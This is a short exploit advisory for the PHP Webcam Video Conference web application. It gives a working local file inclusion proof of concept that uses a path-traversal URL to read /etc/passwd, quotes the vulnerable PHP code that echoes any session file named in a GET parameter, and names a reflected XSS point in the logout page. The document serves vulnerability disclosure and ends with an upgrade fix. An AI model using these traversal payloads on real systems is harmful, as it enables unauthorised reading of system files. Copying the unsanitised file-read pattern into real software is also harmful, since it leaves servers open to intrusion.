# Exploit: PHP Webcam Video Conference - LFI/XSS
# Date: 06/02/2014
# Exploit Author: vinicius777
# Contact: vinicius777 [AT] gmail / @vinicius777_
# Vendor Homepage: http://www.videowhisper.com/
# Software Link: http://sourceforge.net/projects/phpwebcamvideoconference
# Solution: Upgrade from to the new version on videowhisper vendor homepage.
[1] Local File Include - rtmp_login.php
P0C: http://192.168.1.7/vc_php/rtmp_login.php?s=../../../../../etc/passwd
[+] rtmp_rlogin.php
$session = $_GET['s'];
$filename1 = "uploads/_sessions/$session";
if (file_exists($filename1))
{
echo implode('', file($filename1));
}
else
{
echo "VideoWhisper=1&login=0";
}
?>
[2] XSS Reflected
P0C = http://192.168.1.7/vc_php/vc_logout.php?message=[XSS]